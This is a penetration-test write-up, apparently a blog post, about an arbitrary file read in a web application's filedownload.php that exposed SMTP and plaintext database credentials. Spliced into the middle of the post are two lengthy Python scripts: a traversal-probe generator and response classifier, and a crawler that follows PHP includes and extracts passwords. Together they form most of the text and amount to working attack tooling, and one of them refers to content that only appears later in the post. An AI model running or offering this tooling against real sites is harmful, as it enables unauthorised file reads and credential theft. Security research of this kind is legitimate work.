On May 2nd I started a re-evaluation of a web application for a client. While doing the re-evaluation I found that they had added some more functions to the web app, so I started exploring the new features. Everything looked fine, as they were all static HTML pages, until I came across a file, "filedownload.php".
My first step was to spider this branch, which I did with the help of Burp Suite. The full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"
The link disclosed the application's path on disk: E:\netpub\vhosts\www\
Then I simply opened the link "http://site.com/filedownload.php?file=" in my browser and received an error message from the server:
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"
The moment I saw that error I remembered that this might be an old-school, GHDB (Google Hacking Database) style file download vulnerability, so I now had to check for two types of vulnerability:
1. LFI - Local File Inclusion
2. Source Code Disclosure
So after some directory traversal attacks I was sure that LFI was not applicable: the endpoint reads the named file and returns it for download rather than including and executing it, which is the second case, source code disclosure.
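The probing described above can be scripted. The following is an added example, not code from the original post and not the client's application: the host, the leaked document root and the three sample responses are constructed from what this post describes, so the script runs offline. `build_probes` generates the values to try for the `file` parameter for one target filename, `probe_url` percent-encodes them, and `classify` tells raw PHP source (a file read, not an inclusion) apart from the handler's own "NOT SPECIFIED" error and from an empty file such as the web.config above:

```python
"""Probe generation and response triage for a file-download endpoint.

Added example (not code from the original post). The endpoint, the
disclosed docroot and SAMPLE_RESPONSES are constructed from the post so
this runs offline; point it at a real target only with authorisation.
"""
import re
from urllib.parse import quote

ENDPOINT = "http://site.com/filedownload.php"        # endpoint named in the post
DISCLOSED = r"E:\netpub\vhosts\www\httpdocs"          # docroot leaked in the spidered link
NOT_SPECIFIED = "download file NOT SPECIFIED"         # handler's own error text


def build_probes(target, docroot=DISCLOSED, max_depth=4):
    """Candidate `file` values for one target filename.

    Covers the shapes the post tries: the bare relative name, the absolute
    path rebuilt from the leaked docroot (both slash styles) and plain ../
    traversal at increasing depth (both slash styles). Order is stable and
    duplicates are dropped, which matters when every probe is a live request.
    """
    probes = [target]
    for root in (docroot, docroot.replace("\\", "/")):
        sep = "\\" if "\\" in root else "/"
        probes.append(root + sep + target.replace("/", sep))
    for depth in range(1, max_depth + 1):
        probes.append("../" * depth + target)
        probes.append("..\\" * depth + target.replace("/", "\\"))
    seen, unique = set(), []
    for value in probes:
        if value not in seen:
            seen.add(value)
            unique.append(value)
    return unique


def probe_url(value):
    """Full URL with the parameter percent-encoded. ':' and '\\' in a Windows
    absolute path must be encoded or a browser or proxy may mangle them."""
    return f"{ENDPOINT}?file={quote(value, safe='')}"


def classify(body):
    """Label one response body.

    'not_specified': the handler's own error; the parameter was empty/ignored
    'empty'        : request accepted but nothing came back (the web.config case)
    'php_source'   : raw PHP returned unexecuted, i.e. an arbitrary file read
                     (source disclosure). LFI would execute the file and the
                     '<?php' tag would never reach the client.
    'content'      : some other file content was served (e.g. a PDF)
    """
    if NOT_SPECIFIED in body:
        return "not_specified"
    if not body.strip():
        return "empty"
    if re.search(r"<\?(php|=)", body):
        return "php_source"
    return "content"


# Constructed responses standing in for live HTTP replies to three probes.
SAMPLE_RESPONSES = {
    "": "ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath",
    "web.config": "",
    "index.php": "<?php\nrequire_once 'UserUtils.php';\n?>\n<html>...</html>",
}


def triage(responses):
    """Map each probe value to its classification."""
    return {value: classify(body) for value, body in responses.items()}


if __name__ == "__main__":
    for value in build_probes("index.php", max_depth=2):
        print(probe_url(value))
    for value, label in triage(SAMPLE_RESPONSES).items():
        print(f"{value!r:>14} -> {label}")
```

In a live run, `SAMPLE_RESPONSES` would be replaced by the bodies returned for each `probe_url`; a `php_source` hit on any probe is enough to confirm the read primitive and tells you which path shape the handler accepts, so the remaining probes for that file can be skipped.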
Then I started looking for the web.config file, since the server was running Windows IIS.
"http://site.com/filedownload.php?file=web.config" worked, but no luck, as the file was empty.
Then I looked for the "index.php" file, as many web developers put their database connection password in the index file: "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file, but the password was still not present.
But I got a hint: a file named "UserUtils.php" was included from "index.php".
So I started searching for "UserUtils.php" in all the paths I knew. After some hard work I located the file at "E:\netpub\vhosts\www\htdocs\UserUtils.php". Full link:
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
The file contained the SMTP server's administrator email ID, username, password, etc.
But I still was not done; I had to find the database credentials. After reading the whole file I found a new path containing the configuration files "admin/include/config.php" and "admin/include/functions.php".
Now I tried to download the configuration file: "http://site.com/filedownload.php?file=admin/include/config.php"
And cheers, I was able to see the database credentials, as they were stored in plaintext.
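The last part of the hunt, reading one downloaded file to find the next file to download and then pulling the plaintext credentials out of it, can also be automated. The following is an added example, not the post's or the application's code: `FAKE_SITE` is a constructed stand-in (with placeholder credential values) for index.php, UserUtils.php and the two admin/include files, and `fetch` would be replaced by a function that requests `filedownload.php?file=<path>` against a target you are authorised to test. It follows `include`/`require` statements breadth-first and reports `define()` constants and string assignments whose names look credential-related:

```python
"""Follow the include chain in downloaded PHP source and harvest credentials.

Added example, not from the original post. FAKE_SITE is a constructed
stand-in for the files the post downloaded; every value in it is a
placeholder. Replace `fetch` with a function that requests
filedownload.php?file=<path> (authorised targets only).
"""
import posixpath
import re
from collections import deque

# include 'x.php';  require_once('x.php');  include_once("x.php");  ...
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")
# define('NAME', 'value')   and   $name = 'value';
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"]([A-Za-z_]\w*)['"]\s*,\s*['"]([^'"]*)['"]""")
ASSIGN_RE = re.compile(r"""\$([A-Za-z_]\w*)\s*=\s*['"]([^'"]*)['"]""")
# variable/constant names worth reporting; tune per target
SECRET_NAME_RE = re.compile(r"pass|pwd|secret|user|login|host|smtp|key|db", re.I)

# Constructed PHP sources; all credentials below are placeholders.
FAKE_SITE = {
    "index.php": "<?php\nrequire_once 'UserUtils.php';\n$title = 'Journal';\n?>\n<html>...</html>",
    "UserUtils.php": (
        "<?php\n"
        "include_once('admin/include/config.php');\n"
        "require 'admin/include/functions.php';\n"
        "$smtp_host = 'mail.site.com';\n"
        "$smtp_user = 'admin@site.com';\n"
        "$smtp_pass = 'Smtp-Example-1';\n"
        "?>\n"
    ),
    "admin/include/config.php": (
        "<?php\n"
        "define('DB_HOST', 'localhost');\n"
        "define('DB_USER', 'journal_rw');\n"
        "define('DB_PASSWORD', 'Db-Example-2');\n"
        "define('DB_NAME', 'journal');\n"
        "$debug = 'off';\n"
    ),
    "admin/include/functions.php": "<?php\nfunction esc($s) { return htmlspecialchars($s); }\n",
}


def find_includes(source):
    """Paths passed as string literals to include/require. Includes built
    from expressions (dirname(__FILE__) . '/x.php') are not matched; read
    those by hand."""
    return INCLUDE_RE.findall(source)


def find_credentials(source):
    """(name, value) pairs from define() calls and simple string assignments
    whose name looks credential-related."""
    pairs = DEFINE_RE.findall(source) + ASSIGN_RE.findall(source)
    return [(name, value) for name, value in pairs if SECRET_NAME_RE.search(name)]


def resolve_include(including_file, inc):
    """Candidate download paths for one include. PHP resolves a relative
    include against include_path and the working directory, not against the
    including file, so try the including file's directory and the path as
    written."""
    relative = posixpath.normpath(posixpath.join(posixpath.dirname(including_file), inc))
    return [relative] if relative == inc else [relative, inc]


def crawl(fetch, start, max_files=50):
    """Breadth-first walk from `start`, downloading each file at most once.
    `fetch(path)` returns the file body or None. Returns the visit order, the
    paths that could not be fetched, and the credentials found per file."""
    queue, seen = deque([start]), {start}
    visited, missing, credentials = [], [], {}
    while queue and len(visited) < max_files:
        path = queue.popleft()
        body = fetch(path)
        if body is None:
            missing.append(path)
            continue
        visited.append(path)
        found = find_credentials(body)
        if found:
            credentials[path] = found
        for inc in find_includes(body):
            for candidate in resolve_include(path, inc):
                if candidate not in seen:
                    seen.add(candidate)
                    queue.append(candidate)
    return {"visited": visited, "missing": missing, "credentials": credentials}


if __name__ == "__main__":
    report = crawl(FAKE_SITE.get, "index.php")
    for path, creds in report["credentials"].items():
        for name, value in creds:
            print(f"{path}: {name} = {value}")
```

The `missing` list is worth reading as closely as the credentials: an include that the crawler could not fetch by either candidate path is exactly the situation in the post with UserUtils.php, where the file lived under a different directory than the spidered link suggested and had to be located by trying other paths.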
Video tutorial of a similar type of attack: https://www.youtube.com/watch?v=gjREfF5C4RQ
Thanks,
-Raghav Bisht